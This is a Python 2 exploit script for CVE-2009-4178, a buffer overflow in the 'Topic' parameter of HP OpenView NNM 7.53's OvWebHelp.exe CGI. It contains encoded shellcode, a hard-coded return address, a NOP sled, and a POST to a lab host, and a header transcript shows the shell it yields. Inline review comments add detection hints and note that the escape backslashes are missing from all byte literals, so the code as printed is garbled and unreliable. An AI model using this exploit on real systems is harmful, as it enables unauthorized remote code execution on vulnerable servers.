
# Title : HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Published : 2010-03-30
# Author : S2 Crew


#!/usr/bin/python

# Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Date: 2010.03.30
# Software link: http://hp.com
# Version: 7.53
# Tested on: Windows 2003 SP2
# CVE: 2009-4178
# Code:
############################################
# Trying 172.16.29.130...
# Connected to 172.16.29.130.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:Program FilesHP OpenViewwwwcgi-bin>
############################################

import struct
import socket
import httplib
import urllib

#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)
# Flat Python 2 script (print statements, httplib, urllib.urlencode) that sends
# one HTTP POST to a hard-coded host. Everything below runs at import time.
#
# `sc` is the payload stage. The generator log line kept above it identifies it
# as an alphanumeric (x86/alpha_mixed) encoding of 746 bytes; what the decoded
# payload does once it runs is not shown anywhere on this page.
# NOTE(review): as printed here the "\x" escape backslashes are missing from
# every literal, so each string is plain ASCII text rather than the byte values
# the author intended -- the listing is not byte-accurate as extracted.
sc =(
"x89xe3xd9xc3xd9x73xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx49x78x4ex69x45x50x45x50x43x30x45x30x4e"
"x69x48x65x44x71x4bx62x45x34x4ex6bx51x42x44x70"
"x4cx4bx43x62x44x4cx4ex6bx50x52x44x54x4ex6bx43"
"x42x45x78x44x4fx4ex57x50x4ax45x76x50x31x4bx4f"
"x46x51x49x50x4cx6cx45x6cx43x51x43x4cx45x52x46"
"x4cx47x50x4fx31x48x4fx44x4dx43x31x49x57x4bx52"
"x48x70x51x42x43x67x4cx4bx50x52x46x70x4ex6bx47"
"x32x45x6cx47x71x48x50x4cx4bx47x30x44x38x4fx75"
"x49x50x50x74x51x5ax43x31x4ax70x42x70x4cx4bx43"
"x78x46x78x4ex6bx43x68x45x70x47x71x48x53x4ax43"
"x45x6cx47x39x4cx4bx47x44x4cx4bx47x71x4ax76x44"
"x71x4bx4fx45x61x49x50x4cx6cx4bx71x4ax6fx44x4d"
"x45x51x4ax67x47x48x4bx50x43x45x4bx44x46x63x51"
"x6dx49x68x45x6bx51x6dx46x44x43x45x4dx32x46x38"
"x4ex6bx42x78x44x64x45x51x49x43x45x36x4cx4bx44"
"x4cx50x4bx4ex6bx50x58x47x6cx45x51x49x43x4ex6b"
"x46x64x4ex6bx47x71x4ex30x4fx79x50x44x46x44x51"
"x34x43x6bx43x6bx43x51x51x49x42x7ax46x31x49x6f"
"x4bx50x50x58x43x6fx50x5ax4cx4bx44x52x48x6bx4b"
"x36x51x4dx51x78x45x63x46x52x43x30x43x30x43x58"
"x42x57x42x53x46x52x51x4fx50x54x51x78x42x6cx50"
"x77x47x56x47x77x4bx4fx4bx65x4cx78x4ax30x47x71"
"x47x70x43x30x51x39x49x54x51x44x50x50x45x38x46"
"x49x4dx50x50x6bx43x30x49x6fx49x45x50x50x42x70"
"x50x50x42x70x43x70x50x50x47x30x50x50x51x78x49"
"x7ax44x4fx49x4fx4bx50x4bx4fx4bx65x4ex69x4fx37"
"x50x31x49x4bx51x43x45x38x44x42x47x70x47x61x51"
"x4cx4ex69x4bx56x43x5ax46x70x42x76x51x47x50x68"
"x4bx72x49x4bx44x77x43x57x4bx4fx49x45x50x53x43"
"x67x45x38x48x37x49x79x44x78x49x6fx4bx4fx4ex35"
"x51x43x51x43x51x47x45x38x50x74x48x6cx47x4bx49"
"x71x49x6fx4ax75x42x77x4dx59x48x47x51x78x44x35"
"x42x4ex42x6dx50x61x49x6fx49x45x50x68x42x43x42"
"x4dx51x74x43x30x4dx59x49x73x50x57x46x37x43x67"
"x50x31x48x76x42x4ax45x42x46x39x46x36x4dx32x49"
"x6dx42x46x48x47x43x74x46x44x47x4cx47x71x43x31"
"x4ex6dx43x74x51x34x46x70x4fx36x43x30x42x64x46"
"x34x42x70x50x56x50x56x43x66x42x66x51x46x50x4e"
"x46x36x43x66x46x33x43x66x51x78x44x39x48x4cx47"
"x4fx4cx46x4bx4fx4bx65x4ex69x4dx30x42x6ex50x56"
"x43x76x49x6fx46x50x43x58x44x48x4dx57x47x6dx51"
"x70x49x6fx4ax75x4dx6bx4cx30x4cx75x4fx52x43x66"
"x42x48x4dx76x4fx65x4dx6dx4fx6dx49x6fx48x55x47"
"x4cx47x76x43x4cx45x5ax4bx30x4bx4bx4dx30x44x35"
"x43x35x4fx4bx51x57x42x33x51x62x50x6fx43x5ax45"
"x50x42x73x49x6fx4ax75x46x6ax41x41")

# Request body layout. The header names the bug as an overflow of the 'Topic'
# CGI parameter (CVE-2009-4178, NNM 7.53): 57 filler bytes, then the value that
# replaces the saved return address, then a 254-byte 0x90 (NOP) sled and `sc`.
data="A"*57
# Large 'Target' value sent in the same form; its role is not documented on
# this page.
data2 = "B"*5000
# The trailing comment identifies the 4-byte value as a `call esp` inside
# kernel32.dll -- a fixed address on the author's Windows 2003 SP2 test box, so
# the script is specific to that patch level. Same missing-backslash caveat as
# `sc`: as printed, these literals are ASCII text, not bytes.
ret = "xDFxf2xe5x77" + "x90" * 254 + sc # call esp kernel32.dll
payload = data + ret

# Form-encode both parameters as an application/x-www-form-urlencoded body.
p = urllib.urlencode({'Topic':payload,'Target':data2})
# Browser-like headers. For detection: the User-Agent string is distinctive,
# and a POST to /OvCgi/OvWebHelp.exe whose Topic field is over a kilobyte is
# far outside normal help-page requests; the fix is the vendor patch for
# CVE-2009-4178 and not exposing the OvCgi directory to untrusted networks.
h = {"Content-Type": "application/x-www-form-urlencoded","Accept": "text/html","User-Agent": "BackTrack", "Accept-Language": "en"}

# Single plain-HTTP connection (default port) to the hard-coded lab host -- the
# same address as the telnet transcript in the header.
c = httplib.HTTPConnection('172.16.29.130')
c.request("POST","/OvCgi/OvWebHelp.exe",p,h)
r = c.getresponse()

# Only the HTTP status line is reported; the script does not itself verify
# the outcome, the header's transcript is the author's out-of-band evidence.
print r.status, r.reason
c.close()

# Intended as "\nDone\n"; the backslashes were lost in extraction as above.
print "nDonen"